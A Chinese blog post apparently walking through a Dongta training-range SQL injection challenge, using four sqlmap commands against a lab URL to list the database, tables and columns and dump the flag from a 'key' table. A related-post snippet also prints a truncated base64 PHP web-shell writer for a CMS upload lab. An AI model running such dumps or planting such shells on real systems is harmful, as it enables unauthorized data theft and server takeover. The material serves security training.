东塔靶场:SQL注入之get注入1

最新推荐文章于 2024-05-22 20:01:38 发布
最新推荐文章于 2024-05-22 20:01:38 发布
阅读量1.5k 收藏
点赞数
文章标签: sql php 数据库 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51646864/article/details/120248460
版权

1、点开链接进入靶场
在这里插入图片描述
2、直接sqlmap拖库:sqlmap -u http://120.25.24.45:30833/index.php?user=harry --current-db
得到数据库名为"dotaxueyuan"
在这里插入图片描述
3、看一下这个库的表:sqlmap -u http://120.25.24.45:30833/index.php?user=harry -D dotaxueyuan --tables
发现里面有key和users两个表
在这里插入图片描述
3、猜测通关的key藏在key表中,查看该表的列
sqlmap -u http://120.25.24.45:30833/index.php?user=harry -D dotaxueyuan -T key --columns
得到id和key两列
在这里插入图片描述
4、查看key这列内容sqlmap -u http://120.25.24.45:30833/index.php?user=harry -D dotaxueyuan --tables -C key --dump
最后拿到了key
在这里插入图片描述

遥远之空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql数字型注入-东塔靶场
qq_27846373的博客
03-26 5340
sql数字型注入-东塔靶场 超级简单,非常适合新手找信心 环境及准备: vmvare安装kali2018,没有2018其他版本kali也行 kali自带的sqlmap 靶场东塔靶场数字型注入,免费使用的噢,注册一个账号就行 https://labs.do-ta.com/index/course/index?one=15&two=17&three=0&level=0&other=-1&title= 首先打开linux的终端,输入sqlmap就可以启动sqlmap.
东塔学院(sql注入篇 字符型注入,报错注入,JSON,文件读取、写入 )
m0_55563900的博客
03-30 1012
什么是sql注入 SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为 称为SQL注入。 代码对带入SQL语句的参数过滤不严格 未启用框架的安全配置,例如: PHP的magic. quotes. _gpc 未使用框架安全的查询方法 测试接未删除 未启用防火墙 未使用其他的安全防护设备 字符型注入类型1 打开页面,叫我们输入ID作为带数值的参数 Mysql查询经常用到的语句 查库:select schema_name from information_schem
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 848
owasp十大漏洞中第一的sql注入
渗透测试练习靶场汇总
最新发布
2401_84215240的博客
05-22 1201
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //接下来我将给各位同学划分一张学习计划表!
sql注入(get)
wysw1998的博客
08-04 2429
SQL注入漏洞介绍: SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所有的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL注入的产生原因通常表现在以下几方面:1.不当的处理;2.不安全的数据库配置;3.不合理的查询集处理;4.不当的错误处理;5.转义字符处理不合适;6.多个...
东塔靶场之文件上传cms--pluck
qq_43665434的博客
03-24 795
东塔靶场之文件上传cms–pluck pluck是一个小型简单的内容管理系统,由PHP写成。即使你没有编程语言知识,也可以很容易地使用它来管理站点,功能有给页面插照片、在blog里写文章、分享照片等 pluck cms后台存在文件上传漏洞,攻击者可以利用该漏洞获取获取服务器权限 准备: 一个info.php文件 <?php file_put_contents('qianxun.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz
CVE-2020-11890:CVE-2020-11890
03-10
#步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80 hoangkien1020 / joomla:3.9.16 #Step 3:通过端口8080访问您的域/ IP: 带有凭据的此图像内 用户名密码 ...
大桥东塔桩基冻结法施工技术.docx
12-04
大桥东塔桩基冻结法施工技术
应用BIM技术提升广州东塔项目总包管理水平(杨玮).pptx
09-22
广州东塔项目作为一个超高层建筑,其总包管理面临着诸多难题。首先,在进度管理方面,由于项目规模宏大、专业交叉复杂,导致进度编制和跟踪困难,同时配套工作管理和作业面协调问题频发。合同管理上,合同信息分散,...
沈阳东塔跨浑河桥钢结构施工方案.doc
11-20
沈阳东塔跨浑河桥钢结构施工方案
应用BIM技术提升广州东塔项目总包管理水平.pptx
10-03
"应用BIM技术提升广州东塔项目总包管理水平" 本资源摘要信息是基于应用BIM技术提升广州东塔项目总包管理水平的pptx文件,主要涵盖了项目管理中的难题、BIM解决思路、主要系统介绍和应用效果总结等方面。 一、项目...
SQL初学(4):报错注入
m0_64417923的博客
05-06 361
感觉比上一个时间盲注要简单一些。 SQL报错注入就是利用数据库的机制,人为地制造错误条件,使得在显示错误信息同时返回查询结果。这种手段在联合查询受限且能返回错误信息的情况下比较好用。 一,xpath语法错误引发的报错注入: 使用的函数语句: 1,extractvalue 的作用是从xml文档中查询指定字符串,具体用法是: EXTRACTVALUE (XML_document, XPath_string); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第.
东塔靶场——基于表单的暴力破解
m0_50211409的博客
03-24 485
burp介绍。 burp是一个非常强大的工具,burp是在浏览器与服务器之间的一个双向代理工具,可以将用户和服务器之间发送的数据包进行拦截下来!进行分析 测试环境! 1:东塔靶场 2:burp工具 *配置burp和火狐浏览器代理 首先在上面我们知道burp在浏览器是以代理存在的,如果想要拦截数据包我们需要设置一个代理。 1,设置burp代理 ...
SQL注入入门攻略 SQL-LABS靶场 第1关 基于GET请求方式注入 ~
Jiuchen的博客
06-29 592
打开PhpStudy启动apache和mysql设置网站根目录指向保存的sql-labs目录 修改sql-labs数据库连接配置文件在sql-labs目录下的sql-connections/db-creds.inc文件改为自己实际的mysql账号和密码 默认为root/root 启用网站 (我的网站端口是8091)访问http://127.0.0.1:8091 页面打开效果图 安装security数据库点击页面中 Setup/reset Database for labs 至此 sql-labs搭建完成.
网络安全、渗透测试靶场全集
qq_37776764的博客
04-26 833
writeup文章:https://github.com/niudaii/my-vulstack-wp。封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。武汉安鸾学院 – 武汉网络安全培训-渗透测试培训-Web安全培训。在线演示: http://vulfocus.fofa.so/10.python2的常见漏洞靶场(python2)LFI-labs 和本地文件包后漏洞利用靶场Sqli-Labs:(sql注入靶场)3.韩国Webhacking。
东塔攻防世界CSRF的Get型
weixin_51646864的博客
10-08 1744
CSRF跨站点请求伪造(Cross-Site Request Forgery) 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 靶场练习: 1、点开环境,发现已经给了几个账号,密码默认为123456,如下图 2、先用vince用户登录进入如下界面 3、修改个人信息并用bp抓包拦截 4、接下来进行CSRF Poc生成 5、创建csrf文件
SQL注入靶场实战-MySQL
qq_40467699的博客
04-17 9295
注:本次测试使用纯手工注入,无任何自动化软件辅助。 此靶场是运用了数据值的base64位编码,在转换编码的时候比较困难,手工回显注入无任何差别(无过滤字符)。 这里推荐火狐浏览器的HackBar插件,插件自带编码转换功能比较方便。 靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozh...
sql注入靶场_sql注入
weixin_26705651的博客
09-21 933
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
SQL注入——知表名不知列明情景下查询数据
Js_123456789的博客
04-28 739
场景 有某些情况,可以查找到表名,但查找不到列名。 MySQL < 5 或 web过滤 information_scema 详解 select `1` from (select 1,2,3,4,5,6,7,8,9,10,11,12,13 union select * from 表名)a limit 1,1 子查询中select的数目为列数。 通过列数 1,2,3... 再union...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值